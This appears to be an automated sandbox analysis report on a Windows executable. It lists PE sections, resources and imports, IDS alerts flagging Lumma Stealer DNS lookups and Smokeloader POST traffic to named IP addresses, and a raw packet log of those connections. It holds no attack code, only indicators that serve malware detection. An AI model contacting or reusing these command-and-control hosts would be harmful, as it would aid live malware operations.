                                                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x16c | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xe331 | 0xe400 | d36f1f8a6894ef66718fdaf189ebe71d | False | 0.6024362664473685 | data | 6.724208372728653 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x10000 | 0x7238 | 0x7400 | ebac625979f148341b89f8cd221d5b2b | False | 0.38092672413793105 | data | 4.835000748822607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x18000 | 0x2873620 | 0x17c00 | d94559dd843534ab3d29ed0c388d7fac | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x288c000 | 0xd180 | 0xd200 | c3f3bcd725688b7f6ebcaf490d54b8f1 | False | 0.34536830357142856 | data | 4.5663764717504 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AFX_DIALOG_LAYOUT | 0x28925a0 | 0x2 | data | | | 5.0
RT_CURSOR | 0x28925a8 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | | | 0.1948529411764706
RT_CURSOR | 0x28928d8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.33223684210526316
RT_CURSOR | 0x2892a30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968
RT_CURSOR | 0x28938d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196
RT_CURSOR | 0x2894180 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579
RT_CURSOR | 0x2894718 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4375
RT_CURSOR | 0x2894848 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | | | 0.44886363636363635
RT_CURSOR | 0x2894920 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.27238805970149255
RT_CURSOR | 0x28957c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.375
RT_CURSOR | 0x2896070 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5057803468208093
RT_CURSOR | 0x2896608 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755
RT_CURSOR | 0x28974b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018
RT_CURSOR | 0x2897d58 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751
RT_ICON | 0x288c700 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Japanese | Japan | 0.42883795309168443
RT_ICON | 0x288d5a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Japanese | Japan | 0.5532490974729242
RT_ICON | 0x288de50 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Japanese | Japan | 0.5858294930875576
RT_ICON | 0x288e518 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Japanese | Japan | 0.6047687861271677
RT_ICON | 0x288ea80 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Japanese | Japan | 0.445746887966805
RT_ICON | 0x2891028 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Japanese | Japan | 0.4915572232645403
RT_ICON | 0x28920d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Japanese | Japan | 0.5230496453900709
RT_DIALOG | 0x2898588 | 0x5a | data | | | 0.8666666666666667
RT_STRING | 0x28985e8 | 0x42c | data | Japanese | Japan | 0.4597378277153558
RT_STRING | 0x2898a18 | 0x58c | data | Japanese | Japan | 0.44577464788732396
RT_STRING | 0x2898fa8 | 0x1d2 | data | Japanese | Japan | 0.5321888412017167
RT_GROUP_CURSOR | 0x2892a08 | 0x22 | data | | | 1.0294117647058822
RT_GROUP_CURSOR | 0x28946e8 | 0x30 | data | | | 0.9375
RT_GROUP_CURSOR | 0x28948f8 | 0x22 | data | | | 1.0588235294117647
RT_GROUP_CURSOR | 0x28965d8 | 0x30 | data | | | 0.9375
RT_GROUP_CURSOR | 0x28982c0 | 0x30 | data | | | 0.9375
RT_GROUP_ICON | 0x2892538 | 0x68 | data | Japanese | Japan | 0.6826923076923077
RT_VERSION | 0x28982f0 | 0x294 | OpenPGP Secret Key | | | 0.5045454545454545
DLL | Import
KERNEL32.dll | GetProcAddress, GlobalAlloc, GetLastError, SetLastError, GetThreadContext, GetTickCount, CreateEventA, LoadLibraryA, LoadLibraryW, LoadLibraryExW, GetModuleFileNameW, GetSystemDirectoryA, GetTempPathA, CreateDirectoryW, SetFileAttributesW, GetVolumeInformationA, BuildCommDCBW, SetComputerNameExA, VerifyVersionInfoW, IsProcessInJob, SetVolumeMountPointW, GetLocaleInfoW, SetCalendarInfoW, GetNumberFormatW, GetStringTypeW, SetConsoleCursorInfo, AllocConsole, WriteConsoleW, AddConsoleAliasA, OutputDebugStringW, GetConsoleCP, FlushFileBuffers, IsBadStringPtrA, InterlockedExchange, EncodePointer, DecodePointer, ReadFile, RaiseException, RtlUnwind, GetCommandLineW, IsProcessorFeaturePresent, HeapAlloc, HeapFree, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapSize, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, SetFilePointerEx, GetConsoleMode, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetCurrentThreadId, GetProcessHeap, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LCMapStringW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, SetStdHandle, CreateFileW
USER32.dll | GetSysColorBrush, DdeFreeStringHandle
GDI32.dll | GetCharWidthW
Language of compilation system | Country where language is spoken | Map
Japanese | Japan |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/26/24-10:22:33.956954 | UDP | 2052787 | ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) | 52163 | 53 | 192.168.2.4 | 1.1.1.1
05/26/24-10:25:58.715000 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52746 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:25:39.806023 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52743 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:22:25.599878 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49738 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:24:23.638002 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52694 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:25:03.657070 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52737 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:22:30.290385 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49741 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:24:41.911621 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52697 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:22:33.788541 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49744 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:22:59.723663 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52656 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:24:47.097794 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52698 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:24:28.877506 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52695 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:25:22.040106 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52740 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:22:36.018013 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49748 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:23:03.796266 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52658 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:24:58.756614 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52736 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:24:36.577364 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52696 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:22:58.584278 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52655 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:25:16.590426 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52739 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:22:23.170190 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49736 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:25:52.705023 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52745 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:22:26.743766 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49739 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:24:18.309650 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52693 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:25:34.563116 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52742 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:25:11.186455 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52738 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:22:28.089697 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49740 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:25:29.338724 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52741 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:22:32.694240 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49743 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:22:34.953458 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49746 | 80 | 192.168.2.4 | 190.28.110.209
05/26/24-10:25:47.428708 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 52744 | 80 | 192.168.2.4 | 185.18.245.58
05/26/24-10:22:24.295939 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49737 | 80 | 192.168.2.4 | 190.28.110.209
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              May 26, 2024 10:22:32.232585907 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.233443022 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.233501911 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.235353947 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.238645077 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.238722086 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.239438057 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.243433952 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.243499994 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.308259010 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.308994055 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.309067965 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.310157061 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.311676025 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.311733961 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.313180923 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.314768076 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.314804077 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.314836025 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.318209887 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.318272114 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.318293095 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.320972919 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.321010113 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.321038961 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.321043015 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.321090937 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.323235989 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.324496984 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.324532032 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.324554920 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.326982975 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.327017069 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.327049971 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.329581022 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.329638958 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.329652071 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.332166910 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.332226038 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.332259893 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.332263947 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.332323074 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.334507942 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.334582090 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.334642887 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.336235046 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.336276054 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.336344957 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.338243961 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.338279963 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.338335991 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.340286970 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.340322971 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.340384960 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.341543913 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.341578960 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.341631889 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.343466997 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.344485044 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.344518900 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.344546080 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.346472979 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.346527100 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.346541882 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.348290920 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.348366022 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.350204945 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.350239992 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.350272894 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.350301027 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.350310087 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.350363016 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.351540089 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.352374077 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.352408886 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.352430105 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.355129957 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.355163097 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.355187893 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.394944906 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.395138979 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.399995089 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.418895006 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.419028044 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.419318914 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.420124054 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.420212030 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.420736074 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.421515942 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.421580076 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.422785997 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.422822952 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.422878027 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.424252033 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.424288988 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.424340010 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.425941944 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.425981045 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.426032066 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.426866055 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.426903963 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.426959991 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.428646088 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.428683043 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.428749084 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.430042028 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.430079937 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.430140018 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.431622028 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.431659937 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.431714058 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.432925940 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.432962894 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.432995081 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.433015108 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.434268951 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.434303999 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.434329987 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.435714006 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.435750008 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.435781002 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.437138081 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.437174082 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.437202930 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.438426971 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.438463926 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.438513041 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.438513041 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.438575029 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.439688921 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.439726114 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.439784050 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.440956116 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.440992117 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.441041946 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.442198992 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.442234993 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.442306995 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.443506002 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.443542004 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.443607092 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.444174051 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.444762945 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.444797039 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.444833040 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.445866108 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.445943117 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.446460962 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.446516037 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.446585894 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.447622061 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.447659016 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.447722912 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.448674917 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.448712111 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.448771954 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.449254036 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.449290037 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.449347973 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.450298071 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.450858116 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.450892925 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.450926065 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.451896906 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.451931953 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.451965094 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.452922106 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.452958107 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.452986956 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.452992916 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.453058004 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.453910112 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.453946114 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.454013109 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.454818964 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.454854012 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.454909086 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.455729008 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.455764055 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.455820084 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.456645966 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.456682920 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.456757069 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.457551956 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.457586050 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.457618952 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.457643032 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.458379030 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.458414078 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.458447933 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.459213018 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.459249020 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.459279060 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:36.801389933 CEST44349747188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:36.801431894 CEST49747443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:36.818933010 CEST44349747188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:36.819024086 CEST49747443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:36.819082022 CEST44349747188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:36.825930119 CEST44349747188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:36.826122046 CEST49747443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:36.826179028 CEST44349747188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:36.829330921 CEST44349747188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:36.829426050 CEST49747443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:36.829447985 CEST44349747188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:36.829601049 CEST44349747188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:36.829766035 CEST49747443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:36.831443071 CEST49747443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:36.831478119 CEST44349747188.114.96.3192.168.2.4
